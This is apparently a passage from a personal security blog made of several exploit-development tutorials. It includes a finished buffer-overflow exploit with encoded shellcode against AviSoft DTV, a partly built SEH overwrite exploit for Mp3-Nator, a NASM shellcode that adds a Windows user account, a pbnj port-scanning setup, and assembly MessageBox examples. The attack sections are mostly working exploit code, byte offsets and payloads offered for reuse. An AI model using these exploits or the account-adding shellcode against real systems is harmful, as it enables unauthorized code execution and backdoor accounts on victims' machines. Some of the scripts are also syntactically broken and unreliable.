It is comparing data's file and memory. If there is no bad char then File and Memory data will be same. See above the first line:

9   9   99  100 | 0a ... 6c      | 00 ... 61      | expanded 

Unfortunately it did not match. Mona also suggesting that the bad char may be "0a" because "0a" from file does not match to memory ... is it?



So this time again we need to generate bytearray:

!mona bytearray -b "\x00\x0a"

Now we again need to compare with bytearray(See above, it is same).... Just keep doing it until i found all bad chars.

                             



                                              EXECUTE SHELLCODE
By mona i found the bad chars are "\x00\xff\x0a\0x0d\x1a". After found these bad chars i regenerated the shellcode:

root@pusheax.com:/usr/bin# msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\0x0d\x1a\xff" -t c
[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)

unsigned char buf[] = 
"\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79";

Well, Let's modify the script again,change the shellcode. The Final reliable working exploit is:

print"Creating expoit."
f=open("crash-me.PLF","w") #Create the file

push="\x90"*260#Found by mona.py 
eip ="\xab\xa7\x11\x64"#EIP
junk="\x90"*500#500 nops before real shellcode

#msfpayload windows/exec cmd=calc R |msfencode -b "\x00\xff\x0a\0x0d\x1a\xff" -t c
shellcode=("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
shellcode+="\x90"*900#Okay, Need enough junk , so nops instead "A"

all=push+eip+junk+shellcode

try:   
    f.write(all)        
    f.close()
print"File created"
except:
print"File cannot be created"

After regenerating the "crash-me.PLF" open in AviSoft DTV and it will execute calc.exe. I did it in debugger with pressing F9:

Anytime We can change the windows/exec shellcode to reverse shellcode which will connect to my specified IP address with command shell. 

The same exploit will work on windows 7 too :

Because i used EIP address from the application itself. If i would use the EIP from OS dll then of course the exploit won't work(The advantage of application's dll).

This is it!

Note: Exploit writing is much more about research. Without researching it is not possible to be an exploit writer . If you have questions,advices, please comment here or mail me and i will try to answer(Love to discuss!).

If you want to learn more about exploit development(In details) , read corelan's tutorial https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/.Much better than other commercial training :).

Port scanning using pbnj!

March 29, 2013, 12:52 am

≫ Next: (N)ASM windows MessageBox , import dll

≪ Previous: Exploit writing - Stack based Buffer overflow

$

0

0

Recently i installed Kali Linux on Vmware workstation. There was a tool called pbnj which can scan port and store results in mysql database. Sometime it is useful storing vulnerable assessment into database.But in Kali linux it is not installed as default. pbnj use nmap(with "-a [options] to scan network , I only use it store the result in database!

Let's  see how to install and use it to scan port and store to database

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj

Start mysql services on Kali Linux:

root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking fortables which need an upgrade, are corrupt or were 
not closed cleanly..

Let's find all file related of pbnj :

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums

I am going to use mysql so i am only interested in "/usr/share/doc/pbnj/examples/mysql.yaml" . So we need to edit this file to use correct username, password and database :

root@find:~# cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml;\

nano ~/.pbnj-2.0/nano config.yaml
# YAML:1.0
# Config for connecting to a DBI database 
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd:""
# Password for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306

In Kali mysql password is blank and username "root". You should really change the username and password. But i am doing it without changing anything. Set let's configure mysql:

root@find:~# mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>

We are ready to go now:

root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
    Can pass hostnames, IP addresses, networks, etc.
    Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
   -i  --iplist <iplist>     Scan using a list of IPs from a file
   -x  --xml <xml-file>      Parse scan/info from Nmap XML file

Scan Options:
   -a  --args <args>         Execute Nmap with args (needs quotes)
   -e  --extraargs <args>    Add args to the default args (needs quotes)
       --inter <interface>   Perform Nmap Scan using non default interface
   -m  --moreports <ports>   Add ports to scan ex: 8080 or 3306,5900
   -n  --nmap <path>         Path to Nmap executable  
   -p  --pingscan            Ping Target then scan the host(s) that are alive
       --udp                 Add UDP to the scan arguments
       --rpc                 Add RPC to the scan arguments
   -r  --range <ports>       Ports forscan [def 1-1025]

       --diffbanner          Parse changes of the banner

Config Options:            
   -d  --dbconfig <config>   Config forresults database [def config.yaml]
       --configdir <dir>     Directory forthe database config file

       --data <file>         SQLite Database override [def data.dbl]
       --dir <dir>           Directory forSQLite or CSV file [def . ]

General Options:                
       --nocolors            Don't Print Colors
       --test <level>        Testing information
       --debug <level>       Debug information
   -v  --version             Display version
   -h  --help                Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Now Let's scan port:

root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for127.0.0.1
--------------------------------------

Above the command option "-a" for nmap argument is "-sS". Scan finished and hopefully result written to database. Let's check:

root@find:~# mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information forcompletion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
    ->;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines         |
| services         |
+------------------+
2 rows inset (0.00 sec)

mysql>select* from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid  | service    | state | port | protocol | version         | banner          | machine_updated | updated_on               |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
|   12 | mysql      | up    | 3306 | tcp      | unknown version | unknown product | 1364339543      | Tue Mar 26 19:12:23 2013 |
|   12 | postgresql | up    | 5432 | tcp      | unknown version | unknown product | 1364339543      | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows inset (0.00 sec)

mysql>

mysql>select* from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip            | host      | localh | os         | machine_created | created_on               |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
|   1 | 192.168.2.92  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   2 | 192.168.2.96  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   3 | 192.168.2.91  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   4 | 192.168.2.98  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   5 | 192.168.2.99  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   6 | 192.168.2.100 | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   7 | 192.168.2.97  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   8 | 192.168.2.94  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|   9 | 192.168.2.93  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|  10 | 192.168.2.90  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|  11 | 192.168.2.95  | 0         |      0 | unknown os | 1364339153      | Tue Mar 26 19:05:53 2013 |
|  12 | 127.0.0.1     | localhost |      1 | unknown os | 1364339543      | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows inset (0.00 sec)

mysql>

There is another tool installed called outputpbnj which can be used to dump the result without manually logging to MySQL.

root@find:~# locate outputpbnj
/usr/bin/outputpbnj
/usr/share/man/man1/outputpbnj.1p.gz

root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options] 
Query Options:
   -q  --query <name>       Perform sql query
   -t  --type <type>        Output Type [csv,tab,html]
   -f  --file <filename>    Store the result in file otherwise stdout
       --both               Print results and store them in a file
       --dir <dir>          Store the result in this directory [def .]

   -l  --lookup <name>      Lookup descrition based on name
       --list               List of names and descriptions
   -n  --name               Lookup all the names 
   -d  --desc               Lookup all the descriptions 
   -s  --sql                Lookup all the sql queries 

Config Options:
        --qconfig <file>    Config of sql queries [def query.yaml]
        --dbconfig <file>   Config foraccessing database [def config.yaml]
        --configdir <dir>   Directory forthe database config file

        --data <file>       SQLite Database override [def data.dbl]

General Options:      
       --test <level>       Testing information
       --debug <level>      Debug information
   -v  --version            Display version
   -h  --help               Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Okay, Let's dump the latest result:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"

wtf!

It is not working for as expected, No problem i am going to edit the "outputpbnj"(perl script). I have to remove "|" from "test" and "debug". Kali linux use LeafPad text editor so "leafpad /usr/bin/outputpbnj" or you can use gedit or kate/kwrite(KDE) . Then searching for "test|=s":

GetOptions(
\%options,
'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
'query|q=s',  'names|n',     'desc|d', 'sql|s',  'list',
'dbconfig=s', 'configdir=s', 'dir=s',  'data=s', 'qconfig=s',
'test|=s',    'debug|=s',
'help|h'    => sub { help(); },
'version|v' => sub { print_version(); },
'both'      => sub { $bothOutput = 1 },
    )
    or exit 1;

Just remove the pipe "|" from "test" and "debug", It should be :'test=s',    'debug=s'  Now save and run :

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013    localhost   mysql   up  unknown versiontcp
Tue Mar 26 19:12:23 2013    localhost   postgresql  up  unknown version tcp

It is possible save the output in different format. For example:

root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr# 

Another curiosity that i can use only one query("-q") or there are more.... no, I can use many command:

possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit  

All the query command is available in outputpbnj script(With Description)!



These kind of tool really useful for vulnerability assessment. pbnj is really a nice tool.

(N)ASM windows MessageBox , import dll

April 1, 2013, 3:31 am

≫ Next: My first shellcode was in two registers, The adduser shellcode!

≪ Previous: Port scanning using pbnj!

$

0

0

Mostly i use NASM, GCC, LD for programming practices! Because I use Linux as my primary Operating system, So i love to use cross-platform application.

I am not an asm coder, in past i have searched a lots for ASM(nasm) code of MessagBox() function Example just to get started. Because everything was fairly new to me(i had no clue!). So i just decided to post a simple example code which was my first assembly program for windows, in case someone is searching for basic example for getting started. I hope it will be useful to someone who is in same situation as i was!

First Example:

extern _ExitProcess@4
extern _MessageBoxA@16

global _main

section .data
msgb db "pusheax.com!",0
title db "Security Research!",0
section .text

_main:

push dword 0x00
    ;mov     esi,msgb
    ;push esi
push dword title
push dword msgb
push dword 0
    call _MessageBoxA@16

push 0
    call _ExitProcess@4

"extern" is importing symbol from other module. In our case the symbols are _ExitProcess@4 and _MessageBoxA@16. There are three things we see are:

1. underscore before MessageBoxA .
2. @4/16 

The underscore used for calling the function in C style, Linux does not have underscore(_). And @4/16 indicating that how many parameter for the calling function. Such as MessageBox has 4 parameters. Each parameters are 4 bytes so 4 parameters are (4*4) 16bytes=4 . Extra "A" for ANSI-C .

"global _main" , declaring it as startup of our asm instructions(C style).



"Section .data" , you know what is it! Declaring uninitialized data such as variable.

in "section .text" (our codes) there are all parameters pushed to stack in reverse mode. I have called MessageBox(see here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx ). The MessageBox in C should be like this:

MessageBox(NULL,msgb,title,0x00000000L)


in ASM it is opposite:

First pushing the 0x00000000L(MB_OK) to stack. Currently top of the stack!
Then pushing "title" . "title" is now top of the stack.
Then pushing "msgb". Same as above. "msgb(string)" top of the stack .
And last push is 0 . Same as above.
At last call the function.

Stack is LIFO(Last in first out). So it is now:

MessageBox(NULL,msgb,title,0x00000000L)

 It is always always good idea terminating the current process so ExitProccess() function has been called when MessageBox() operation is completed.

Compile the code :
nasm -fwin32 msg.asm
gcc msg.obj -o msg.exe

But I want to import specific dll because all dlls are not loaded so some API function may not work if i can't load the dll in my code. How i do this ? "import MessageBoxA@16 user32.dll" ? I think this is not going to happen for me because nasm will not generate win32 object file(Perhaps issue). So i need to work with obj (nasm -fobj msg.asm) but another issue is gcc won't compile the obj file.. I used ALINK (Download: http://alink.sourceforge.net/), This what we want instead using gcc/LD (maybe)? But still LD can be used to compile it by linking library with (-l) . Here is the code i have assembled with nasm and compiled with alink.exe:

import MessageBoxA user32.dll ;Include the dll user32.dll
extern MessageBoxA          ; Now calling external symbol without underscore.... 

section .data               
msgme   db "Hi",0           ;Say "Hi" to pusheax.com

section .text use32 CLASS=CODE          ;"use32 CLASS=CODE for telling the other linker(Such as alink.exe) that program for 32bit

..start:                    ; ..start (not _start) for other linker for start of the code

    push    dword   0x00    ; MB_OK
    mov     esi,msgme       ;esi="Hi"
    push    esi             ;"Hi" is now top of the stack, second paramaters title
    push    dword   msgme   ; Say "Hi"
    push    dword   0       ;Reserve 
    call    [MessageBoxA]   ;Call the Function

;nasm -fobj msg2.asm
;alink -oPE msg2.obj

 If we use ld(with gcc) then our command should be ld -o what.exe what.obj -luser32.dll whereas alink.exe -oPE what.exe but nasm. For alink we don't need to declare how many parameters , underscore etc and for ld we need to declare all the required things and extra option "-l" to link dll.  

Which Linker you will use?

My first shellcode was in two registers, The adduser shellcode!

April 2, 2013, 5:49 am

≫ Next: (N)ASM LoadLibrary,GetProcAddress and MessageBox!

≪ Previous: (N)ASM windows MessageBox , import dll

$

0

0

I always tried to learn to write simple shellcode in assembly language. But writing the shellcode was not my first interest , my interest was Exploit writing. I had to learn to understand assembly language for various reason such as Understanding how computer works, Effectively use of Debugger, Exploit writing,fun etc. So i searched on Google a lots "Writing shellcode" , Fortunately I found some amazing tutorials(Reference!). I will explain each line of my first shellcode below. Before that i want to tell that what tools i used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c


The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
    jmp short command        


function:                     ;Label 
    ;WinExec("Command to execute",NULL)
    pop     ecx
    xor     eax,eax
    push    eax
    push    ecx
    mov     eax,0x7c8623ad
    call    eax

    xor eax,eax
    push    eax
    mov eax,0x7c81cafa
    call    eax



command:                  ;Label
    call function
    db "cmd.exe /c net user pusheax popebp /ADD"
    db 0x00

So let me explain each line

[BITS 32]: Tell the nasm the code is for 32bit.


global _start : Declare main starting label .


section .text : Declare the code section.


jmp short command: jmp instruction used for jumping to another label call "command" . "Call" instruction is not possible because "call" will save then next instruction to stack to get back to next instruction. This is really a common trick when writing shellcode. So it is telling to jump to "command" label and keep no return address in stack.



So now we are in label "command" and it holds following instructions:-

call function : Calling "function" label and saving the next address(whatever) in stack for return purpose . The Next instruction is simple system command:

 db "cmd.exe /c net user pusheax popebp /ADD"

So whatever , we are in label "function" 

There is a simple windows API  we need call is WinExec(),http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx  . It only requires two parameter.

pop     ecx : Take the current return address into ecx and remove the address from stack.


xor     eax,eax : cleaning the eax register to 0. We can directly push 0 to stack but clearly it will issue null bytes. So most shellcoder does xor.


push     eax : pushing 0 to stack. Since Stack is LIFO so it will be the last parameters.

push     ecx : Do you remember that we have popped an address into ecx ? ecx actually holding "cmd.exe /c net user pusheax popebp /ADD" . So we need to push this string to stack for WinExec() first parameter. Currently stack holds: WinExec("cmd.exe /c net user pusheax popebp /ADD",NULL).

mov     eax,0x7c8623ad :   0x7c8623ad is address of WInExec(). Moving this address into eax . I found this address using arwin.exe ( ./arwin.exe Kernel32.dll WinExec ).


call      eax : eax=WinExec(). So it is executing the API function.


xor    eax,eax: clean eax register. Because we are going to terminate the current process soon. We are going to call ExitProcess() function to exit the current process. otherwise shellcode may get corrupted. You may see it on Debugger. 

 push   eax: Same as above we are pushing the last parameters to stack.


mov     eax,0x7c81cafa : Same as above i used arwin to find the address of ExitProcess() function.


call      eax: eax=ExitProcess's address. Calling eax will execute the function.

Test

1. nasm -f bin -o shellcode.bin
2. ./xxd-shellcode.sh shellcode.bin
3. paste into the shellcode-test.c:
4. compile with mingw and execute then check the new user name :).



 Reference:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

(N)ASM LoadLibrary,GetProcAddress and MessageBox!

April 21, 2013, 9:24 am

≫ Next: Content spoofing attack (Brother of Reflected XSS)!

≪ Previous: My first shellcode was in two registers, The adduser shellcode!

$

0

0

When i was reading shellcode writing tutorial The LoadLibrary and GetProcAddress was been just confused me. But it was really easy to understand in normal asm code. It was bit harder for me when i first tried to write a bit dynamic windows shellcode.  So for understanding the dynamic dll loading in shellcode first i decide to learn to load the dll dynamically in normal (n)asm code and it was easy:

section .data

ldlibry dd  0
pro dd  0
dll db  "user32.dll",0
myFtion db  "MessageBoxA",0
MSG db  "ASM GetProcAddress",0

extern _LoadLibraryA@4
extern  _FreeLibrary@4
extern  _GetProcAddress@8
extern  _ExitProcess@4

global _start

section .text

_start:
    push    dll         ;push user32.dll
    call    _LoadLibraryA@4     ;Call the API.
    mov [ldlibry],eax       ;eax hold return address. So eax=LoadLibrary("user32.dll") and now ldlibry=LoadLibrary("user32.dll")

    ;now we need to call GetProcAddress

    push    myFtion         ;The API name we are going to call
    push    eax         ;LoadLibrary("user32.dll")
    call    _GetProcAddress@8   ;GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA"). Again eax holding the return address


    push    0x0         ;MB_OK
    push    MSG         ;TITLE="ASM GetProcAddress"
    push    MSG         ;Messgage="ASM GetProcAddress"
    push    0           ;Reserved=0
    call    eax         ;Call MessageBoxA through GetProcAddress. 

    push    dword [ldlibry]     ; ldlibry holding the LoadLibrary("user32.dll"). Again load to Free up.
    call    _FreeLibrary@4      ;Call the Windows api FreeLibrary()

    ;We should exit the process otherwise it may cause "access violation"
    push    0           ;load 0 to stack        
    call    _ExitProcess@4      ;Call ExitProcess


    ;Assembl:
    ;nasm -fwin32 ldlibrary.asm
    ;ld -o ldlibrary.exe ldlibrary.obj -lkernel32  

---

Content spoofing attack (Brother of Reflected XSS)!

April 27, 2013, 12:47 am

≫ Next: New page of pusheax.com on Facebook !!!

≪ Previous: (N)ASM LoadLibrary,GetProcAddress and MessageBox!

$

0

0

Content spoofing is altering data/text of web pages. XSS uses <script> or any other JS  (E.G: <script>alert(1)</script> whereas  Content spoofing not. It can be using text or html code. A hacker can deface the page virtually. But not able to own the server/web.


Since there are two good explanation of this vulnerability so you better read there:

https://www.owasp.org/index.php/Content_Spoofing
http://projects.webappsec.org/w/page/13246917/Content%20Spoofing



Something like this:
https://www.owasp.org/index.php/Pusheax.com_is_a_independent_penetration_tester,_ethical_hacker_who_always_love_to_learn_new_things_and_share_knowledge.Knowledge_should_be_free_but_not_the_hard_work._There_is_nothing_perfect.

http://projects.webappsec.org/w/page/13246917/%28pusheax%20is%20a%20regular%20independent%20pentester%20,%20I%20love%20to%20learn%20new%20things,and??

It is not such a powerful to hack entire server or an website but sometime these kind of vulnerability is enough to make the users fool.

New page of pusheax.com on Facebook !!!

May 4, 2013, 1:43 am

≫ Next: Exploit writing>>> SEH based!

≪ Previous: Content spoofing attack (Brother of Reflected XSS)!

$

0

0

There is a new page created on Facebook to keep updated of all new and important post. Join :

https://www.facebook.com/pages/pusheaxcom/373711796082900


========
pusheax.com

Exploit writing>>> SEH based!

May 22, 2013, 10:32 am

≫ Next: Getting started in pentesting!!!

≪ Previous: New page of pusheax.com on Facebook !!!

$

0

0

Today i have re-exploited a software called mp3-nator. SEH based is bit challenging. I am going to show you quickly that how i exploited this SEH based vulnerable using only following tools:

1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For  shellcode).
4. Vulnerable Application

Access Violation!

First going to make the application crashed(The classic way!). Before that attach the application to immunity debugger. Hope you already know how to attach an application on Immunity Debugger(File>>Attach>> Find Mp3-Nator>>Click on Attach):

The simple python script:

print"Creating expoit."
f=open("nator.plf","w") #Create the file

push="A"*6000

try:   
    f.write(push)       
    f.close()
print"File created"
except:
print"File cannot be created"

After generating the "nator.plf" we need to open the file:

1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.

But unfortunately it is not going to overwrite the EIP at all because of SEH.

EDX,EBP,ESI and EDI holding our own buffer(We can replace with shellcode!). But SEH also got overwritten by our buffer:

Overwriting SEH mean we can control SEH and Next SEH, Which mean we can make the SEH to divert the call to your shellcode!

What ? What is SEH? The SEH

http://msdn.microsoft.com/en-us/library/windows/desktop/ms680657%28v=vs.85%29.aspx

http://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms

Buffer space

I used mona.py to create the pattern(metasploit can do this too). If you don't know to install mona or how to use it then go to  redmine.corelan.be/projects/mona‎ And read the manual.

The simple mona command is : pattern_create 6000 and replace "A" with the pattern saved in indicated location(For me it is on: C:\mona\MP3N) . Re-generate the nator.plf and open with Mp3-nator on Immunity and we see:

We see SEH and Next SEH got overwritten with mona's pattern. Actually this time we need to find out how much junk buffer we need to reach the SEH(Same as EIP). Let's find:

Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:

print"Creating expoit."
f=open("nator.plf","w") #Create the file

push="A"*4108#4112-4
push+="B"*4#Next SEH
push+="C"*4#SEH
push+="D"*2000#Shellcode
try:   
    f.write(push)       
    f.close()
print"File created"
except:
print"File cannot be created"

If next SEH is "BBBB" and SEH is "CCCC" then we are ready to go :) .

DO SOMETHING WITH SEH and NSEH

 

This time we want to overwrite SEH and Next SEH with an valid address so that it goes to our shellcode. The common address to find "pop pop ret" for SEH and few bytes jump address in Next SEH.

Run mona command !mona seh at crash time ,open the file and find the null-free  address. But unfortunately our life is not that easy so there is no no null-free address. The Exploit is going to be bit challenging.

Anyway, I have choose the address 0x00448f7a of MP3N.exe.  Since we have Null byte at our return address so we simply can't put our shellcode normally as we did before.

Do the Calculation

 Calculation for storing shellcode 

LONG JUMP

                        

NSEH

Our calculation is done!!!

BUILDING THE EXPLOIT

Now our exploit:

junk+shellcode+nops+jump+nseh+seh+more

in normal SEH based overflow we first find an address for "pop pop ret" and a short jump in NSEH , Such as "\xeb\x08\x90\x90" but this is forward jump whereas we need backward jump as we already calculated using metasm(jmp $-20) . Anyway, Since we have only null-bytes SEH(0x00448f7a) address so we can't simply short jump to our nops or shellcode.  For this reason we will need a long jump to land in where our nops starts.

The simple way to explain this,

Junk 2608. Put nops instead "A" to be safe. Then put the 343 bytes shellcode. So stack holding 2608+343 , Then more 1152 nops(\x90) and the long jump "\xe9\x2b\xf8\xff\xff"  . The long jump is some kind of instruction and it is 5 bytes. We now have exact bytes to overwrite the SEH and NSEH with our address:

2608+343+1152+5=4108 .

After the 4108 junk we need NSEH to make a short jump to our long jump. If we make 20 bytes backward jump then we land in our nops within 1152. Remember, Nops does nothing but goes over. So stack simply again executing the long jump  "\xe9\x2b\xf8\xff\xff". After executing the long jump it will again go back to our nops within 2608. After the the nops we have shellcode to execute. Since we made 2000 backward jump so it needs 1113 nops to pass to reach our shellcode.

Anyway, Let's get back to debugger and do some test:

print"Creating expoit."
f=open("nator.plf","w") #Create the file

#343 bytes shellcode
shellcode ="D"*343
nops ="\x90"*1152
jump ="\xe9\x2b\xf8\xff\xff"#Jump back -2000 bytes
nseh ="\xeb\xea\x90\x90"#short jump 
seh ="\x7a\x8f\x44\x00"#0x00448f7a
more="\x90"*1000

try:   
    f.write(junk+shellcode+nops+jump+nseh+seh+more)     
    f.close()
print"File created"
except:
print"File cannot be created"

Open the application on debugger,run and search the SEH address 0x00448f7a . Set a breakpoint by pressing F2.

